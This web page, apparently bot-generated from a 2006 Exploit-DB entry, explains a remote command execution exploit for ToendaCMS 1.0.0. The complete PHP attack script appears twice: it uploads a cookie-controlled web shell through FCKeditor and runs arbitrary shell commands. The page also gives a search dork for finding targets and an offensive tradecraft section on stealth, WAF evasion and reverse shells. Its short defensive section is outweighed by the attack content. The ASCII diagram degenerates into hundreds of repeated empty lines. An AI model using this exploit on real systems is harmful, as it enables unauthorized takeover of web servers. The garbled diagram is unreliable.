By exploitdb papers bot•July 18, 2006•
papers
Exploiting ToendaCMS 1.0.0: Arbitrary File Upload via FCKeditor
Exploiting ToendaCMS 1.0.0: Arbitrary File Upload via FCKeditor
What this paper is
This paper details a vulnerability in ToendaCMS version 1.0.0. Specifically, it describes how an attacker can exploit a flaw in the FCKeditor component to upload arbitrary PHP files to the web server. Once a malicious PHP file is uploaded, the attacker can then execute arbitrary commands on the server by leveraging a cookie-based command execution mechanism.
Simple technical breakdown
The core of the vulnerability lies in how the FCKeditor's file upload functionality in ToendaCMS handles file types. It appears to have a weak check on allowed file extensions. The exploit crafts a POST request to the FCKeditor's connector script, disguised as a legitimate file upload. The uploaded file is a PHP script that listens for commands via a cookie. After uploading, the attacker sends a GET request to the uploaded PHP file, passing the desired command in a cookie. The PHP script then executes the command and returns the output.
Complete code and payload walkthrough
The provided PHP script is a command-line tool designed to automate the exploitation process.
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork: \"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo\n\n";
//works regardless of any php.ini settings,
// --- Argument Parsing and Usage ---
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to toendacms\n";
echo "cmd: a shell command\n";
echo "Options:\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo "Example:\n";
echo "php ".$argv[0]." localhost /cms/ ls -la\n";
die;
}
error_reporting(0); // Suppress all error reporting
ini_set("max_execution_time",0); // Set maximum execution time to unlimited
ini_set("default_socket_timeout",5); // Set default socket timeout to 5 seconds
// --- Utility Function: quick_dump ---
// This function appears to be for debugging or displaying raw data in a hex/ASCII format.
// It's not directly used in the exploit logic but might have been for development.
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) // Check if character is non-printable
{$result.=" .";} // Represent non-printable with a dot
else
{$result.=" ".$string[$i];} // Display printable characters
if (strlen(dechex(ord($string[$i])))==2) // Check if hex representation is 2 digits
{$exa.=" ".dechex(ord($string[$i]));} // Append hex value
else
{$exa.=" 0".dechex(ord($string[$i]));} // Pad with a leading zero if 1 digit
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} // Newline every 15 characters for formatting
}
return $exa."\r\n".$result; // Return hex dump followed by ASCII representation
}
// --- Network Function: sendpacketii ---
// This function handles sending raw HTTP packets to the target, with optional proxy support.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; // Regex to validate proxy format
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex; // Access global variables
if ($proxy=='') { // If no proxy is specified
$ock=fsockopen(gethostbyname($host),$port); // Open a direct socket connection
if (!$ock) {
echo 'No response from '.$host.':'.$port; die; // Error if connection fails
}
}
else { // If a proxy is specified
$c = preg_match($proxy_regex,$proxy); // Validate proxy format
if (!$c) {
echo 'Not a valid proxy...';die; // Error if proxy format is invalid
}
$parts=explode(':',$proxy); // Split proxy IP and port
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; // Inform about proxy connection
$ock=fsockopen($parts[0],$parts[1]); // Open socket connection to proxy
if (!$ock) {
echo 'No response from proxy...';die; // Error if proxy connection fails
}
}
fputs($ock,$packet); // Send the crafted packet
if ($proxy=='') { // If no proxy
$html='';
while (!feof($ock)) { // Read response until end of file
$html.=fgets($ock);
}
}
else { // If using a proxy
$html='';
// Read response until double CRLF (end of HTTP headers) is encountered
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1); // Read byte by byte
}
}
fclose($ock); // Close the socket connection
#debug
#echo "\r\n".$html; // Uncomment for debugging raw HTTP responses
}
// --- Main Script Logic ---
$host=$argv[1]; // Target host from command line argument
$path=$argv[2]; // Path to ToendaCMS from command line argument
$port=80; // Default port
$proxy=""; // Default proxy
$cmd=""; // Variable to store the command to be executed
// Parse command line arguments for port and proxy
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1]; // Get first two characters of the argument
if (($temp<>"-p") and ($temp<>"-P")) // If it's not a port or proxy option
{$cmd.=" ".$argv[$i];} // Append to the command string
if ($temp=="-p") // If it's a port option
{
$port=str_replace("-p","",$argv[$i]); // Extract port number
}
if ($temp=="-P") // If it's a proxy option
{
$proxy=str_replace("-P","",$argv[$i]); // Extract proxy address
}
}
// Path validation
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} // Ensure path starts and ends with '/'
// Construct base path for requests
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} // If proxy, use full URL; otherwise, just the path
// --- Payload Construction ---
// This is the PHP shellcode that will be uploaded.
// It's designed to execute commands passed via the 'cmd' cookie.
$shell="<?php echo chr(72).\"i Master!\";if(get_magic_quotes_gpc()){\$_COOKIE[\"cmd\"]=stripslashes(\$_COOKIE[\"cmd\"]);}";
$shell.="ini_set(\"max_execution_time\",0);error_reporting(0);"; // Disable execution time limits and error reporting
$shell.="echo \"*delim*\";passthru(\$_COOKIE[\"cmd\"]);?>"; // Echo a delimiter and execute the command from the 'cmd' cookie using passthru
// --- Allowed Extensions List ---
// This list defines the file extensions that the exploit will try to use for uploading the shell.
// The vulnerability allows uploading files with these extensions, and the exploit appends ".php" to make it a PHP file.
$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla");
// --- Exploit Loop ---
// Iterate through the allowed extensions to attempt the upload.
for ($i=0; $i<=count($allowed_extensions)-1; $i++){
$filename="suntzu.php.".$allowed_extensions[$i]; // Construct the filename (e.g., suntzu.php.jpg)
$data="-----------------------------7d529a1d23092a\r\n"; // Multipart form data boundary
$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n"; // Form field name and filename
$data.="Content-Type:\r\n\r\n"; // Content type (empty, letting the server infer or bypass checks)
$data.="$shell\r\n"; // The PHP shellcode
$data.="-----------------------------7d529a1d23092a--\r\n"; // End of multipart form data
// --- Crafting the Upload Packet ---
// This POST request targets the FCKeditor file upload connector.
$packet="POST ".$p."engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n"; // Specify multipart form data
$packet.="Host: ".$host."\r\n"; // Target host
$packet.="Content-Length: ".strlen($data)."\r\n"; // Length of the data being sent
$packet.="Connection: Close\r\n\r\n"; // Close connection after sending
$packet.=$data; // The actual data (multipart form)
sendpacketii($packet); // Send the upload packet
// --- Crafting the Command Execution Packet ---
// This GET request attempts to access the uploaded shell and execute the command.
$packet="GET ".$p."data/images/File/".$filename." HTTP/1.0\r\n"; // Path to the uploaded file
$packet.="Host: ".$host."\r\n"; // Target host
$packet.="Cookie: cmd=".$cmd."\r\n"; // The command to execute is passed in the 'cmd' cookie
$packet.="Connection: Close\r\n\r\n"; // Close connection after sending
sendpacketii($packet); // Send the command execution packet
// --- Checking for Success ---
// The script checks for a specific string ("Hi Master!") to confirm the shell executed successfully.
if (eregi("Hi Master!",$html)){ // If the response contains "Hi Master!"
$temp=explode("*delim*",$html); // Split the response by the delimiter
die($temp[1]); // Output the command execution result (after the delimiter)
}
}
// If the loop finishes without success
echo "Exploit failed..."; // Indicate that the exploit was unsuccessful
?>
# milw0rm.com [2006-07-18]
**Code Fragment/Block -> Practical Purpose**
* `#!/usr/bin/php -q -d short_open_tag=on` -> Specifies the interpreter and enables short open tags.
* `echo "ToendaCMS <= 1.0.0 ..."` -> Prints banner and information about the exploit.
* `if ($argc<4) { ... die; }` -> Checks for the minimum number of command-line arguments and prints usage instructions if insufficient.
* `error_reporting(0);` -> Disables error reporting to keep the output clean.
* `ini_set("max_execution_time",0);` -> Sets the script's execution time limit to unlimited.
* `ini_set("default_socket_timeout",5);` -> Sets a timeout for socket operations.
* `function quick_dump($string)` -> A helper function for displaying raw data in hex/ASCII format (likely for debugging).
* `$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';` -> Regular expression to validate proxy IP:Port format.
* `function sendpacketii($packet)` -> Core function for sending HTTP requests, handling direct connections and proxy connections.
* `global $proxy, $host, $port, $html, $proxy_regex;` -> Declares variables used from the global scope within the function.
* `$ock=fsockopen(...)` -> Establishes a socket connection to the target or proxy.
* `fputs($ock,$packet);` -> Sends the crafted HTTP packet over the socket.
* `while (!feof($ock)) { $html.=fgets($ock); }` (direct) / `while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); }` (proxy) -> Reads the HTTP response from the socket.
* `fclose($ock);` -> Closes the socket connection.
* `$host=$argv[1]; $path=$argv[2];` -> Assigns target host and path from command-line arguments.
* `for ($i=3; $i<=$argc-1; $i++){ ... }` -> Parses command-line arguments for port (`-p`) and proxy (`-P`) options, and builds the command string (`$cmd`).
* `if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) { ... die; }` -> Validates that the provided path starts and ends with a forward slash.
* `if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}` -> Constructs the base URL for requests based on whether a proxy is used.
* `$shell="<?php echo chr(72).\"i Master!\";if(get_magic_quotes_gpc()){\$_COOKIE[\"cmd\"]=stripslashes(\$_COOKIE[\"cmd\"]);}ini_set(\"max_execution_time\",0);error_reporting(0);echo \"*delim*\";passthru(\$_COOKIE[\"cmd\"]);?>";` -> This is the PHP payload. It prints "Hi Master!", handles magic quotes by stripping slashes from the `cmd` cookie, disables execution time and error reporting, prints a delimiter `*delim*`, and then executes the command received in the `cmd` cookie using `passthru()`.
* `$allowed_extensions = array(...)` -> A list of file extensions that the exploit will attempt to use for uploading the shell. The vulnerability relies on the FCKeditor not properly sanitizing these extensions when appending `.php`.
* `for ($i=0; $i<=count($allowed_extensions)-1; $i++){ ... }` -> The main loop that iterates through each allowed extension.
* `$filename="suntzu.php.".$allowed_extensions[$i];` -> Constructs the filename for the uploaded shell, e.g., `suntzu.php.jpg`.
* `$data="..."` -> Prepares the multipart/form-data body for the HTTP POST request. This includes the boundary, the `Content-Disposition` header specifying the form field name (`NewFile`) and the crafted filename, and the actual shellcode.
* `$packet="POST ".$p."engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";` -> Crafts the HTTP POST request to the FCKeditor file upload endpoint. The parameters `Command=FileUpload`, `Type=File`, and `CurrentFolder=%2f` are crucial for triggering the upload functionality.
* `$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";` -> Sets the `Content-Type` header to `multipart/form-data` and specifies the boundary string.
* `$packet.="Host: ".$host."\r\n";` -> Sets the `Host` header.
* `$packet.="Content-Length: ".strlen($data)."\r\n";` -> Sets the `Content-Length` header to the size of the data being sent.
* `$packet.="Connection: Close\r\n\r\n";` -> Sets the `Connection` header to `Close` and adds the final CRLF to separate headers from the body.
* `$packet.=$data;` -> Appends the multipart form data to the packet.
* `sendpacketii($packet);` -> Sends the crafted upload packet to the target.
* `$packet="GET ".$p."data/images/File/".$filename." HTTP/1.0\r\n";` -> Crafts the HTTP GET request to access the uploaded shell. The path `data/images/File/` is the default upload directory for FCKeditor in this context.
* `$packet.="Host: ".$host."\r\n";` -> Sets the `Host` header.
* `$packet.="Cookie: cmd=".$cmd."\r\n";` -> **Crucially**, this line injects the shell command into the `cmd` cookie. The PHP shellcode will read this cookie and execute the command.
* `$packet.="Connection: Close\r\n\r\n";` -> Sets the `Connection` header and final CRLF.
* `sendpacketii($packet);` -> Sends the command execution packet.
* `if (eregi("Hi Master!",$html)){ ... die($temp[1]);}` -> Checks the response for the "Hi Master!" string. If found, it splits the response by `*delim*` and outputs the command's output.
* `echo "Exploit failed...";` -> Printed if the loop completes without a successful execution.
## Practical details for offensive operations teams
* **Required Access Level:** Network access to the target web server (HTTP/HTTPS ports). No prior authentication is required if the FCKeditor component is accessible.
* **Lab Preconditions:**
* A ToendaCMS 1.0.0 instance running on a test server.
* The FCKeditor component must be configured and accessible via its standard path (e.g., `engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php`).
* The web server must be configured to allow PHP execution and file uploads to the `data/images/File/` directory (or a similar default location).
* The PHP `allow_url_fopen` setting is not directly relevant for this exploit as it uses direct socket connections, but `short_open_tag` needs to be enabled (which the exploit script forces via `ini_set`).
* **Tooling Assumptions:**
* PHP interpreter installed on the attacker's machine.
* Basic network connectivity.
* **Execution Pitfalls:**
* **Path Misconfiguration:** The `$path` argument must accurately reflect the root directory of the ToendaCMS installation. Incorrect paths will lead to failed requests.
* **FCKeditor Path Variations:** The exploit assumes a specific path for the FCKeditor connector (`engine/js/FCKeditor/...`). If the CMS uses a different path, the exploit will fail.
* **Upload Directory Permissions:** If the web server cannot write to the `data/images/File/` directory, the shell upload will fail.
* **Firewalls/WAFs:** Network firewalls or Web Application Firewalls (WAFs) might detect and block the unusual `multipart/form-data` POST requests or the subsequent GET requests with the `cmd` cookie.
* **PHP Configuration:** While the exploit attempts to bypass some `php.ini` settings, extreme configurations (e.g., very restrictive file upload limits, disabled `passthru` or `exec` functions) could prevent execution.
* **Magic Quotes:** The shellcode includes a check for `get_magic_quotes_gpc()`. If this is enabled, it will strip slashes from the cookie, which is handled by the shellcode itself. If it's disabled, the shellcode will execute the command directly.
* **Extension Blacklisting:** If the server has a more robust file upload validation that blocks the specific extensions used in `$allowed_extensions`, the exploit might fail. The attacker could try other common extensions if they know them.
* **Tradecraft Considerations:**
* **Reconnaissance:** Thoroughly identify the ToendaCMS version and the presence/path of the FCKeditor component. Use dorks as suggested in the script.
* **Stealth:** The exploit is noisy. The POST and GET requests are distinct. WAF evasion techniques might be necessary for more stealthy operations.
* **Payload Customization:** The `suntzu.php` filename is a placeholder. A more sophisticated payload might be used, and the filename could be randomized.
* **Command Execution:** The `cmd` cookie is a simple mechanism. For persistent access, a more advanced reverse shell or beacon would be uploaded.
* **Telemetry:** Network traffic logs showing POST requests to the FCKeditor connector and GET requests to the uploaded file. Web server logs showing file creation in the upload directory. Process execution logs on the server showing `passthru` or similar functions being invoked.
## Where this was used and when
* **Context:** This exploit targets ToendaCMS, a web content management system. The vulnerability lies within the FCKeditor component, a popular rich text editor that was integrated into many web applications.
* **Timeframe:** Published in **July 2006**. This indicates that the vulnerability was present and exploitable around that period. Exploits from this era often targeted older, less patched web applications.
## Defensive lessons for modern teams
* **Input Validation:** Always validate file uploads rigorously. This includes checking file extensions, MIME types, and file content. Do not rely solely on client-side validation or simple extension checks.
* **Secure Component Integration:** When integrating third-party components like FCKeditor, ensure they are up-to-date and properly configured. Vulnerabilities in components can lead to compromise of the entire application.
* **Principle of Least Privilege:** Configure web server directories with appropriate permissions. The upload directory should not have execute permissions, and write permissions should be restricted.
* **Web Application Firewalls (WAFs):** Deploy and maintain WAFs to detect and block malicious HTTP requests, including those attempting arbitrary file uploads and command injection.
* **Regular Patching and Updates:** Keep all web applications, CMS platforms, and their components (like editors) updated to the latest secure versions.
* **Monitoring and Logging:** Implement robust logging for web server access, file system changes, and process execution. Monitor these logs for suspicious activity.
* **Disable Unnecessary Features:** If features like `passthru` or `exec` are not required for the application's functionality, consider disabling them or restricting their use at the PHP configuration level.
## ASCII visual (if applicable)
```ascii
+-----------------+ +--------------------------+ +---------------------+
| Attacker's | ----> | ToendaCMS Server | ----> | Web Server File |
| Machine (PHP) | | (HTTP Request) | | System |
+-----------------+ +--------------------------+ +---------------------+
| | |
| 1. Craft & Send POST | |
| to FCKeditor upload | |
| (suntzu.php.jpg) | |
| | |
| | |
| | |
| 2. Craft & Send GET | |
| with 'cmd' cookie | |
| (e.g., ls -la) | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
---
## Original Exploit-DB Content (Verbatim)
```text
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork: \"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo\n\n";
//works regardless of any php.ini settings,
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to toendacms\n";
echo "cmd: a shell command\n";
echo "Options:\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo "Example:\n";
echo "php ".$argv[0]." localhost /cms/ ls -la\n";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
$cmd="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$shell="<?php echo chr(72).\"i Master!\";if(get_magic_quotes_gpc()){\$_COOKIE[\"cmd\"]=stripslashes(\$_COOKIE[\"cmd\"]);}";
$shell.="ini_set(\"max_execution_time\",0);error_reporting(0);";
$shell.="echo \"*delim*\";passthru(\$_COOKIE[\"cmd\"]);?>";
$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla");
for ($i=0; $i<=count($allowed_extensions)-1; $i++){
$filename="suntzu.php.".$allowed_extensions[$i];
$data="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n";
$data.="Content-Type:\r\n\r\n";
$data.="$shell\r\n";
$data.="-----------------------------7d529a1d23092a--\r\n";
$packet="POST ".$p."engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
//echo $html;
$packet="GET ".$p."data/images/File/".$filename." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
if (eregi("Hi Master!",$html)){
$temp=explode("*delim*",$html);
die($temp[1]);}
}
//if you are here...
echo "Exploit failed...";
?>
# milw0rm.com [2006-07-18]